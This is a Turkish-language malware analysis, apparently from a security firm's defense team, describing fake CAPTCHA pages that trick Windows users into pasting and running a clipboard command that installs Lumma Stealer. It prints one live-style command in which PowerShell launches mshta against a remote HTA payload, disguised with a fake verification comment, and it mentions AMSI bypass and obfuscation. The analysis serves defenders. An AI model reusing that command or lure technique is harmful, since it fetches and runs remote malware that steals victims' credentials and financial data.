Sahte CAPTCHA ekranları, kullanıcıları kandırarak kötü amaçlı yazılımları indirip çalıştırmaya yönlendiren bir saldırı tekniği olarak son birkaç yıldır karşımıza çıkmaktadır. Modern internet dünyasında, web sitelerinin sunduğu içeriklerde karşımıza çıkan CAPTCHA‘lar (Completely Automated Public Turing test to tell Computers and Humans Apart), insanların botlardan ayırt edilmesi için geliştirilen özel çözümlerden biri olarak karşımıza gelmektedir.
Amaç kullanıcı girişi, dosya indirme, form doldurma gibi aktivitelerde insanları botlardan ayırt edebilmektir. Ancak botlara karşı alınan bu güvenlik önlemi, günümüz internet dünyasında siber suçluların elinde sahte internet siteleri kullanarak siber bir tuzağa dönüşen ve en zayıf halkayı yani kurum çalışanlarını hedefleyen bir siber saldırı tekniği haline geldi.
Sahte CAPTCHA, genel olarak bir içeriğe ulaşmak bir dosya indirmek veya bir işlem yapmak için ziyaret edilen sahte web sitelerinde karşımıza çıkmaktadır.
Kullanıcıların gerçek bir CAPTCHA’ya cevap verdiğini düşünmesini sağlamak için “Bir robot olmadığınızı doğrulamak için kutucuğu işaretleyin” veya “Görseldeki talimatları girin” gibi görevler içermektedir. Aslında, CAPTCHA’ya tıkladığınız zaman kötü amaçlı etkinlikleri tetiklendiğini görüyoruz.
Privia Security Defans ekibinin araştırmalarına göre sahte Captcha’lar ile “Lumma Stealer” adlı kötü amaçlı yazılım birleştirilmekte ve tespitten kaçınmak için yeni teknikler geliştirerek bilinçsiz kullanıcıları hedeflemektedir. Zararlı kodlar sistemde çalışmaya başladığında siber saldırgan kurbanın kimlik bilgileri, finansal veriler ve diğer hassas bilgilerine erişim imkanı sağlıyor. Akabinde siber saldırganların ele geçirdikleri bu bilgileri illegal internet forumlarında satışa sunulduğunu görmekteyiz.
Sahte Captcha Zararlısı Nasıl Çalışıyor?
Gerçek Captcha’ları davranışlarına baktığımıza bot olup olmadığınızı anlamak için resim seçme, matematik işlem yaptırma, resim üzerindeki metni eşleştirme, görsel birleştirme, puzzle ve benzeri teknikleri görmekteyiz.
Bu saldırıda ise farklı bir yöntem kullanılarak kullanıcının Captcha çözmesi yerine Captcha’nın karşısına çıkardığı görevleri yerine getirmesi beklenmekte ve bu işlemler sırasında zararlı kodu sistem çalıştırması hedeflenmektedir.
İncelediğimiz sahte bir web sitesinin kaynak kodunda sahte captcha’yı tıkladığınız zaman ilk olarak zararlı kodların sisteminize kopyalandığını (sağ tıkla kopyala CTRL+C işlevi) görmekteyiz.
Ardından da kurbanın karşısına ise aşağıdaki gibi yerine getirmesi gereken görevler çıkmaktadır. Ancak bu görevlerin amacı sistemde belleğe kopyalan zararlı kodun çalıştırılmasına yöneliktir.
Görselde de görebileceğiniz gibi sahte doğrulama adımları için kullanıcıdan ilk olarak klavyenin Windows + R tuşlarına basması istenmektedir. Kullanıcı bu tuş kombinasyonuna bastığında işletim sisteminin “Çalıştır” uygulaması açılmaktadır.
İkinci adımda ise kullanıcıdan CTRL + V tuşlarına basması istenmektedir. Bu noktada hafızaya kopyalanan zararlı kodlar çalıştır menüsüne yapıştırılır. Üçüncü ve son aşamada ise ENTER tuşuna basarak zararlı kodların çalıştırılması istenmektedir.
Kullanıcı bu görevi tamamlayıp ENTER tuşuna bastığı zaman sisteme kopyalanan bu zarar kodlar Powershell kullanılarak çalıştırılmaktadır.
Zararlı Kod Parçacığı
PowerShell.exe -NoProfile -Command mshta.exe https:// unome. site/ minchkinzangata.xll # ✅ ''I am not a robot - rёCAPTCHA Verification ID: 2188
Privia Security Defans ekibinin tespit ettiği zararlı hareketi incelediğimizde Powershell.exe kullanılarak Mshta.exe üzerinden komuta kontrol sunucusu olan zararlı siteye bağlantı sağlandığı görülmektedir. İlk olarak Remote HTA File Execution Via Powershell (Methodology) alert başlığı ile tespit edilen bu IOC alerti uzak bir hta dosyasını yürütmek için powershell tarafından mshta’nın başlatıldığını algılamaktadır.İlgili alarm MITRE ATT&CK taktikleri olan komuta ve kontrol, savunma kaçınma, yürütme ve tekniklerini (T1059.001, T1105, T1218.005) içermektedir.
Yapılan harekette zararlının komuta kontrol sunucusuna bağlantı sağlarken minchkinzangata.xll sayfası ile iletişim kurduğu zaman sistemde powershell üzerinden 5 adet dosya yazdığını ve 79 adet registry kaydına eriştiği dikkatimizi çekmiştir.
İlgili dosyalar incelendiğinde antivirüslere yakalanmamak için Powershell üzerinde şekil-şifrenmiş komutlar kullanıldığı görülmüştür. Bu şifreli komutlar sayesinde EPP ve EDR ürünlerinin sistemdeki zararlı hareketleri tespit edememesi sağlanmaktadır.
Komuta kontrol sunucusundan indirilen dosyalar sayesinde Powershell kullanılarak şifrelenmiş kodlar decript edilmekte ve ardından sistemde çalıştırılmaktadır. Bu komutlar çalıştırılırken de Powershell üzerinde AMSI Bypass tekniği de kullanılarak sistemde güvenlik ürünlerini atlatmaya çalışılmaktadır.
Bu saldırıda hassas verilerin Lumma Stealer ile çalındığı tespit edilmiş ve kullanıcının sisteminde kendi elleriyle çalıştırdığı zararlı sayesinde verileri ele geçirilmiştir. Tehdit istihbaratlarında ve zararlılar üzerinde yaptığımız araştırmalar, saldırganların Lumma’ya ait olan zararlı kodlar olduğu görülmüştür. Lumma kullanarak sistemlerden veri çalan siber korsanların sahte siteler ve sahte CAPTCHA sayfaları gibi yöntemlerle kurbanların verileri elde ederken illegal forumlarda da satışının yapıldığı görülmüştür.
Sahte CAPTCHA’lar, kurbanı tarayıcının dışında kendi isteği ile kötü amaçlı yazılım indirmeye ve çalıştırmaya yönelik tasarlanan yaratıcı ve dikkat çekici bir sosyal mühendislik parçası olarak karşımıza çıkıyor.
Kriptolu Powershell kodları anti-malware teknikleri ve kötü amaçlı yazılım kodlarını arka planda indirmek, tarayıcı tabanlı siber güvenlik kontrollerinden kaçınan bir anti-analiz mekanizması görevi de görmektedir.
